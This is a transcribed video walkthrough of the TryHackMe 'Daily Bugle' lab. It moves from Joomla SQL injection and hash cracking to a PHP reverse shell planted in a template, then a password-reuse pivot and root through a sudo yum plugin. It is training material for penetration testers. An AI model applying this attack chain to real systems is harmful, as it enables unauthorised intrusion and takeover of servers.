Hey YouTube, welcome back. Today I'm going to be doing a video on the box from TryHackMe called Daily Bugle. And this box is rated as a hard, and it definitely is a challenging one, but I really do like it as in for learning how to enumerate content management systems, so CMS. So the way that we're going to be explaining this box is by enumerating the CMS, which is a Joomla CMS, and finding a SQL injection vulnerability. Now, there is two ways to exploiting this, either using a Python script or SQL map. Now, because I am doing this box with the purpose of practicing for the OSCP, I tend to stay away from SQL maps, so I try to go for alternatives, which I will show you guys in this one. Now, once we're going to actually also be doing cracking the hash, and we will be exporting a sudo command to get root privileges on the machine. So the first thing I did was I already started an Nmap Scan, as you can see here. I'm going to be scanning the top 1,000 ports, making sure it's a TCP connection, only open, and it shows us the reason. So I like to do this because auto recon did take a little bit of a really long time to finish, so this was just quicker. But as you can see, I have 3 ports open, so then after that I like to do the same command but with all the ports, which for my experience running this command like this, it hasn't taken that long, that much of a time to complete, so it returned the same ports. So then once you have these out of all 65,535 ports, you know exactly which ports are open. You can actually minimize those certain ports and do a default script scans, enumerate versions, and then I outputted it to Nmap Scan. So as you can see here, we are running Joomla as our CMS. There is a robots.txt, which has 15 disallowed entries, which is definitely interesting. And there is port 3306, which is my SQL or Maria, but we are unauthorized, so that means that our IP address could not further enumerate this box. So right off the bat, whenever I have my SQL running and a web server running, that can give you an idea that there's some type of logging in or there could be an SQL injection vulnerability because there's a database that's running on the system. So any input that could be like searches or even a user login has to be stored in this database server. So that's something to keep in mind. So what I'm going to do now is I'm actually going to go to the web page. So I'm going to go to HTTP. The IP address, and we have the main web page. So now, once we're on the main web page, it's always good to look at what this page does. So I can see here that we can open different links to these articles here. And I like to look at the bottom left corner just to see if there's anything that pops up, but nothing really interesting pops up. We do have a login form, which we could try to do an admin, nothing, admin, administrator, nothing, and then we can also do admin password, and there's nothing. So now we can try and look for forgot your password, and we have to provide an email address. So let me provide a test@test.com, and it says invalid emails. So it does send an email, and we can't register. So there's no register functionality here. So what I'm going to do is I'm going to run a quick ff scan on here while I check out what the robots.txt had. And like I said in some of my previous videos, I prefer using setlists big.txt word list just because it had better content compared to the Dirtbuster one. So I am running with just to highlight, color the output. This is going to ignore comments on the word list. Threads are going to be 150. Extensions I'm going to do .text, .php, and .html, and I want to filter out all 403s. So what did I miss? I messed up the command, so let's see, what did I miss? Oh, that is why. I completely missed and put F up instead of fuzz. Sorry about that, guys. There we go. So we'll let that run in the background. In the meantime, again, we'll check the robots.txt. And yeah, again, this says this is a Joomla site. It is installed with a folder, okay, and we do have all these disallow entries. So what we can do is we can check out one by one. It's always good to check out what each one of these returns, especially the administrator. Anything with an admin administrator is something that we want. So I'm just going to go here to administrator. And we get another login panel, which this more looks like a control panel for the Joomla CMS. So if you're familiar with like WordPress and a WordPress login page, this is the exact same thing. So we can gain access to this web portal. We can have access to this generic website that we're looking at. So I'm gonna try again to do admin, nothing. Okay, admin, administrator, nothing. Okay, so, and then let's try, see if there's a SQL injection. No. So the reason I don't want to brute force this is because I don't have a username. And another thing is that being able to check for to see if there's maybe some possible default credentials would be better, but also I really do want to know what version this is running. And I see here that this is 2021, and I know for a fact that this box was created prior, so it doesn't tell me a lot, but there's actually a cool tool out there that we can use to enumerate different CMSs. So it's called Cms Seek, and we could look at the GitHub repo here. I am not a robot. Cool, and it's this one. So this is a good script to have. It is a Python script, and what it does, it helps you enumerate different CMSs. And we always want to find versions, because that will help us enumerate further what this is. So we can also go and look for some Joomla default credentials. So Joomla So it says here's your default password, so you won't be able to use a single value to access any installation of CMS. So possibility, we do have admin. So we could brute force this if we wanted to, but let's first look at the versions. So we're gonna run Cms Seek, and I've already copied it to my ops folder. And the way you run it is just go Python Cms Seek, .py, and then we're going to do URL, and we're going to do our IP address of the CMS. And we'll do this Python 3. There we go. There we go. So it's that simple. A cool thing is also you can give this CMS a list of different IP addresses, and it'll just enumerate it. But we see that it finished very quickly, and it found that this was Joomla version 3.70, which is excellent. And there's a readme.txt, which we can also look at. And we can see here that this tells us this is Joomla 3.7. So now we can look at two things. So we can do search exploit, right? And we can do Joomla 3.7, and we get two different possibilities for SQL injections. But the one that we're going to be interested in is this one, the com fields, because it is the exact version 3.7.0 compared to this one. Now this one, you could run it. I have not personally used this exploit, so I'm not 100% sure if it actually work or against this version, but it should if, I mean, the versions match unless that's 0 is the nail in the coffin. But with this one, we can use this exploit. But this exploit right here is telling you to run SQL map. Now, you can run SQL map if you like. This will, again, SQL map is such a powerful tool that it will enumerate it. But again, for OSCP people, SQL map is not allowed on the exam. So we're going to go to our good friend, Uncle Google, and we're going to go here, Joomla 3.7.0 exploit. And let's just do Python. And we have different exploitations. So we have Joomla 3, which is a Python tool that you can just go here and copy and paste it to your directory. So we can do that. So I'm going to just copy this, and we will come back to all of this stuff, and we'll go to, let me go to VI, Joom.py. There we go. We can exit this, and how we can do is Python Joom.py just to see how it works. And all we need is a URL. Cool. So we just do http :/ and our IP again, and we just let it run. And as you can see, found tables, extracting users, and there you go. So we found one user, Jonah, their password jonah@tryhackme.com, and this long string. Now, you might be asking, what kind of hash is this? There's multiple ways to analyze a hash. You can obviously go to another window, and we'll go to CyberChef. And again, CyberChef is such a powerful tool that anyone should definitely have in their arsenal. You can paste it here. You can do the big, and it says invalid hash. So let's try this again. And yeah, it says invalid hash. So another thing, if that happens, you have a tool called hash ID. You'll do -m, and the -m is going to give you an output for hashcat, right? You can do, there's another flag for John the Ripper, but I do hashcat, and we know that this is blowfish or bcrypt, right? So the problem with bcrypt / blowfish is that they're made to withstand GPU cracking. So even if I crack this on my host computer with a GPU, it will take 8 days to crack the password. So I'm gonna cheat here a little bit, and for the sake of the video, and we're gonna do a little command here that's gonna be sed TACN, and it's gonna take between words 45,000 to 50,000 from the Rocky word list. I'm gonna pass this to the hash file, and I'm gonna do vi hash, paste it in there, exit, and we're gonna let this crack. And because I already cracked it, I'm gonna run hash show, and the password is Spider-Man123. So now we have this password here, and something that you always want to do is you have a username and a user and a password. So try to throw those passwords anywhere that you have a user where you need a password. So I'm going to go with SSH Jonah, and the IP address will be 165.167. Yes, and we'll do Spider-Man123. And that's not the password. Okay, so next, so we already know SSH, that's not the password. So what other site we have that allows us to input credentials? And it's this one. So let's do Jonah, and we'll do Spider-Man123. And boom, excellent. And we're inside. So now we're inside the control panel as an administrative user, because if you see here, he was the super user. So which means we have administrative privileges on this Joomla CMS. So now I want to get a reverse shell, right? So again, Google is your best friend, and this is how we learn, which is Google, Joomla. We do Google Joomla 3.7.0 remote code execution right here. And we look at maybe what article is there that has this interesting, that will allow us to get a code execution. And there's this Medium article that I found, which has actually the steps to do it. So this is not on the server, but this is from a Vulnhub box that's running this vulnerable version of Joomla as well. So what we can do is scroll down to the non-important stuff that we already did. So here we are. So we are here, right? And basically the way you're gonna go is you're gonna go to extensions, templates, and the way that this works is that you can upload a PHP file under the template section. And as you can, we can go back actually and see our nice handy dandy FF scan, we can see that we do have a templates directory here. So let's do a little fuzzing on this templates directory just to show something. Just I want to see if it'll pick it up. If not, I can show it to you guys manually. But in the meantime, we're gonna continue with the RCE. So we're gonna go to here. We're gonna go to extensions, templates, and we're gonna select templates again. And we can select either Bees3 or Protostar. I'm gonna select Protostar. And now what you're gonna do is you're gonna hit create new. You can name it anything you want. So I'm gonna call this shell, and file type is gonna be a PHP. And now you wanna browse. So Kali has a great repository for it. It's under user share web shells. It's going to be PHP, and it's going to be this PHP reverse shell. I've already copied it under here, and all I'm going to do is I'm going to try to change my IP address, and I always do port 443 just because it's a port that will be less blocked by firewall. So I need to if config, make sure my IP hasn't changed. It hasn't. Great. So what I'm going to do is I'm just going to upload that to here, and I'm going to go to shell.php, upload it, error, no file was found. So let's try this again. see. You can remove that, and let's copy again. Copy here, move php to test.php. And what I'm going to do is I'm going to change my IP address real quick one more time. 10.10.5.33 if I'm not mistaken. It's 14.5, so let's change that again. And I'm going to change this to 443. Cool, so now let's do this process again. No file was found, failed to upload a file. That's strange. Let's do PHP, browse. Okay, so instead of uploading, we can just do a create. And what I'm going to do is I'm going to do gedit, test this, and I'm just going to copy and paste it into this file. There we go. And the last thing we can do is save. And we can see that our file has been saved. And I'm going to do this, and I'm going to start a sudo netcat listener on port 443. And as you can see, yeah, our FFscan didn't pick it up, but what I'm going to show you is that we can go to templates and nothing happens. So that there's no directory listing. But if you look here, it tells us that your file has been saved and that it's going to be under protostar, because remember we edited. Here's robotic, and it says here it's under protostar. So let's go to templates, protostar, nothing, and then the last one is robotic.php. And now it's hanging, and as you can see, we get a shell. So we are efficient. We are actually inside the machine now. Awesome. So that was the RCE part. Now we have to do a little bit of pivoting. So the first thing is I'm going to actually try to get a full interactive shell. So I'm going to go with which Python, and I'm going to do Python tac c import pty.spawn bin bash, and I'm going to do export term, just so I can get my up, down arrows and all that stuff. So sty, so control z, sty, raw echo foreground, and now I have a more stable shell. So let's go to cd home, and we see there's a username JJ missing, but also we see that we're Apache, which the Apache means that we can actually read the var-www.html library. So let's see if I can actually cd into JJ Jameson, and no, we can't. So we do have to do pivoting. So the first thing that I always suggest is, once you have a shell, even as Apache, check out the root document of the web page. And anything that has config in it, or configuration, is definitely your number one thing to check. And we can look and we see that there's his email, and we can scroll, there's a password, and there's a user, localhost, MySQL, and there's a secret. So this seems to be a password for the SQL server. But again, one thing I learned is that users will do password reuse. It is common in Hack the Box, it is common in TryHackMe, and it's definitely common in the real world. So I'm going to take this password here, and I'm just going to try and do the SUJ Jameson, and there you go. We are in the machine. We have officially pivoted to user J Jameson, and the reason was because he decided to reuse a password. So just think about the next time you're creating a password. If you do reuse passwords, it is very common in the real world. So now we can just go to ls.la, home, J Jameson, and we can read the user.txt flag. So now the last thing I'm going to is privilege escalation, right? So I like to save files into the -shm file. The reason why is because this directory is actually deleted anytime the computer or the system reboots. So what I'm going to do is I'm going to go to my Linux privesc directory, and I'm going to run linpiece. So I'm going to do sudo python 3tac http server, and I'm going to do wget http://10.14.5.33/linpiece, and I'm going to make this file executable, and we are going to execute this. Now this should take a little bit of time. Definitely good to just let it run, but also look at the output as it runs. So we see it gives us Linux version. It gives us a sudo version that could be vulnerable. And we're just looking at anything that stands out, running processes as root. These look like very standard common root processes. We're still trying to look for anything that stands out as a non-common process, but nothing seems out of the ordinary. This could be something interesting, but we'll come back to that. Let's see. We'll keep going. Nothing here. Here it is. We have something interesting. Our user J Jameson is allowed to run at -user-bin yum as sudo with no password. So this right here is our privilege escalation because it's highlighted in yellow, and anything with sudo and with no password means that we can run it as root. So what I'm going to do is I'm going to go to GTF opens, and GTF opens is such a great site for these type of exploits because they have everything on how to exploit sudo, SUID, or even file download. So we'll go to sudo, and I want to do a spawn an interactive root shell by loading a custom plugin. So all you have to do is literally just take these commands here and just copy and paste them. And then when you run sudo yum, you have to make sure to do it with the full path. If not, it won't work. So I'm going to take this and I'm going to just copy and paste it into the system. And what the EOF does, it allows us in the command line to write multiple lines without messing up the command line. And then I'm going to just follow these this syntax one at a time. And as you can see here, yeah, we're importing OS, importing yum into a Python script, and it's going to go from yum plugins, import plugin yum exit, and at the end, it's going to execute the bin-sh, giving us a shell. So, and then the last one is sudo yum, but we're going to just going to copy that last part, and what we're going to do is we're going to do sudo dash user dash bin dash yum, copy and paste that, and we're gonna hit enter, and boom, we are officially the root user, and we have officially rooted the box. So we can do cd root, and we can cat the root text flag, and that is the box daily Bugle. So just a quick recap on this box, we were able to exploit the Joomla application by getting an SQL injection on that particular version. And the reason we got that version was because we ran a CMS enumerating tool called Cms Seek. And then from there, we were able to just log in and upload a reverse shell through a template and execute that template through the web server. And then once that web server was executed and we were in the machine, we had to pivot, but the reason we were able to pivot was because, again, any configuration files will have passwords for MySQL databases or just any passwords. And again, the human error is that passwords are reused by people. So always try passwords. Any username and passwords you find, use them on SSH, use them on login portals, or even FTP. And then obviously running limps, we were able to get a privilege escalation attack vector by just running sudo. And that is the box. I appreciate you watching this video. I hope you learned something, and I'll catch you guys on the next video. Later. Peace.